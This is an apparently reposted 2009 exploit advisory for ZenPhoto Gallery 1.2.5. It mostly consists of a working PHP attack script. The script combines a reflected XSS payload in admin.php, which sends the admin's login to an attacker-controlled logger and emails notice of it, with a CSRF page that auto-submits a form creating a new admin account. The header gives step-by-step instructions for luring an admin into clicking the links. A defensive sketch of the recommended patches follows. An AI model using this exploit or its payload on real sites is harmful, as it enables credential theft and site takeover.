ZenPhoto Gallery 1.2.5 Admin Password Reset (CSRF)
Source: petros [at] dusecurity.com  Author: petros  Published: 2009-07-17

<?php
####################################################################
#     ZenPhoto Administrator Password Steal/Reset Exploit          #
#+================================================================+#
#     Discovered and coded by petros [at] dusecurity.com           #
#+----------------------------------------------------------------+#
#     Affects: ZenPhoto Gallery 1.2.5                              #
#+----------------------------------------------------------------+#
# Zenphoto is an answer to lots of calls for an online             #
# gallery solution that just makes sense. After years of           #
# bloated software that does everything and your dishes,           #
# zenphoto just shows your photos, simply. It’s got all the        # 
# functionality and “features” you need, and nothing you don’t.    #
# Where the old guys put in a bunch of modules and junk, we put    #
# a lot of thought. We hope you agree with our philosophy:         #
# simpler is better. Don’t get us wrong though –zenphoto really    #
# does have everything you need for your online gallery.           #
#+================================================================+#
# Exploit Explanation                                              #
#+================================================================+#
#                                                                  #
# This exploit actually takes advantage of two vulnerabilities.    #
# The first exploit is a simple XSS in the admin login page        #
# that will allow us to log the admin's password. Unfortunately,   #
# it only executes if the admin is NOT already logged in.          #
# The second is a CSRF exploit that allows you to change the       #
# admin's password by automatically submitting a form.             #
# This exploit only works if the admin is already logged in.       #
# Combine these and we have two ways to gain admin access.         #
#                                                                  #
#+--------------------------------------------------------------=-+#
# How to patch/prevent these vulnerabilities                       #
#+--------------------------------------------------------------=-+#
#                                                                  #
# The XSS in the zp-core/admin.php page can be patched by          #
# sanitizing the $_GET['from'] variable before outputting it.      #
#                                                                  #
# The CSRF requires either some form of referrer checking or a     #
# hidden security token on all forms (the latter is better).       #
#                                                                  #
#+----------------------------------------------------------------+#
# How to use this exploit to take over a ZenPhoto website          #
#+----------------------------------------------------------------+#
#                                                                  #
# To use the XSS logger make the admin click this link:            #
#                                                                  #
#+--[code snippet - put this all in one line]--+                   #
# http://victimsite.com/zp-core/admin.php?from="><script>          #
# document.forms[0].action="[logger url]";                         #
# </script><div id="lolpwnt                                        #
#+--[ end of code snippet]--+                                      #
#                                                                  #
# Replace [logger url] with the link to this PHP script.           #
# Make sure your log.txt is writable before doing this.            #
# On login the admin's password will be saved to the file.         #
#                                                                  #
# The next exploit is used by simply giving the link to            #
# this script to the admin. If he clicks it his password           #
# will be changed automatically to "ownedbydusec".                 #
#                                                                  #
# That's about it :) Enjoy!                                        #
####################################################################
#            petros [at] dusecurity [dot] com                      #
####################################################################


//* Configure the exploit *//
$site = "http://victim.org/zen-photo";  // URL to vulnerable ZP install (no trailing slash!!)
$log = "log.txt";   // File to save logs to
$user = "admin";   // Name of the new admin
$pass = "ownedbydusec";   // New admin pass
$email = "you@site.com";  // Email to send log notifications to
// Do not edit below this line...

if($_POST)// We got logins from the XSS phisher
{
 $file = fopen($log, 'a');
 if(!$file) redirect();
 fwrite($file,"--==[{$_SERVER['REMOTE_ADDR']}]==--\r\n");
 foreach($_POST as $key => $value)
  fwrite($file, "$key = $value\r\n");
 fwrite($file,"\r\n");
 fclose($file);
 @mail($email, "ZenPhoto Double Penetration Exploit got a password!", "Please check your log file :)");
 redirect(); // send them back to the admin page
 
}
else // try to create a new admin using CRSF
{
 // Fields of the admin-options form, submitted on the logged-in admin's behalf
 $inputs = array(
  "saveadminoptions" => "true",
  "totaladmins" => "1",
  "alter_enabled" => "1",
  "0-adminuser" => $user,
  "0-confirmed" => "2",
  "0-adminpass" => $pass,
  "0-adminpass_2" => $pass,
  "0-admin_rights" => "1",
  "0-options_rights" => "1",
  "0-zenpage_rights" => "1",
  "0-tags_rights" => "1",
  "0-themes_rights" => "1",
  "0-all_album_rights" => "1",
  "0-edit_rights" => "1",
  "0-comment_rights" => "1",
  "0-upload_rights" => "1",
  "0-view_rights" => "1",
  "0-main_rights" => "1",
  "0-admin_name" => "Owned by dusecurity.com",
  "0-admin_email" => 'petros was here &lt;3'
 );
 $action = $site."/zp-core/admin-options.php?action=saveoptions";
 // auto-submit the form as soon as the page has loaded
 echo "<html><head><script>function badboy(){ document.forms[0].submit(); }</script></head>";
 echo "<body onload=\"badboy();\"><form action=\"$action\" method=\"POST\">";
 foreach($inputs as $key => $value)
 {
  echo "<input name=\"$key\" value=\"$value\" type=\"hidden\" />";
 }
 echo '<input type="submit" value="Click Me!" />'; //not that they have a choice lol
 echo "</form></body></html>";
 // notify them by e-mail because the admin will probably notice he cant login
 @mail($email,"ZenPhoto Double Penetration Exploit Success!", "Site: $site/zp-core/admin.php\nUsername: $user\nPassword: $pass");
}


// $site is defined at file scope, so it must be imported into the function
function redirect(){ global $site; header("Location: $site/zp-core/admin.php"); exit; }

?>
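The two fixes the header recommends (escaping the reflected "from" parameter of admin.php, and binding the admin-options form to a per-session token so a cross-site auto-submitted form is rejected), as an added PHP sketch that is not ZenPhoto's own code. The function names, the "csrf_token" field name and the form layout are assumptions for illustration.

```php
<?php
// Added example, not ZenPhoto's own code: a minimal sketch of the two
// fixes recommended in the header above. The function names and the
// "csrf_token" field name are assumptions, not ZenPhoto identifiers.
session_start();

// Fix 1 (XSS in zp-core/admin.php): "from" is reflected into the login
// page, so HTML-escape it wherever it is echoed; as defence in depth,
// also confine it to a same-site relative path before using it at all.
function safe_from_param($from) {
    if (!is_string($from) || $from === '' || $from[0] !== '/'
        || strncmp($from, '//', 2) === 0) {
        return '/zp-core/admin.php';    // default landing page
    }
    return $from;
}

// Fix 2 (CSRF in zp-core/admin-options.php): a per-session secret that
// every state-changing form must carry. The auto-submitted cross-site
// form in the exploit above cannot read it, so its POST is rejected.
function csrf_token() {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(array $post) {
    $expected = isset($_SESSION['csrf_token']) ? $_SESSION['csrf_token'] : '';
    $given    = isset($post['csrf_token']) ? $post['csrf_token'] : '';
    // hash_equals() keeps the comparison constant-time.
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // only now act on saveadminoptions / 0-adminuser / 0-adminpass ...
}

// Rendering: the escaped "from" value and the hidden token inside the form.
$from  = htmlspecialchars(safe_from_param(isset($_GET['from']) ? $_GET['from'] : null),
                          ENT_QUOTES, 'UTF-8');
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form action="/zp-core/admin-options.php?action=saveoptions" method="POST">';
echo '<input type="hidden" name="from" value="' . $from . '">';
echo '<input type="hidden" name="csrf_token" value="' . $token . '">';
echo '</form>';
```

With the token check in place, the forged POST built by the script above arrives without a valid csrf_token and is refused with a 403, while the escaped "from" value can no longer break out of its attribute to inject script.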


 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved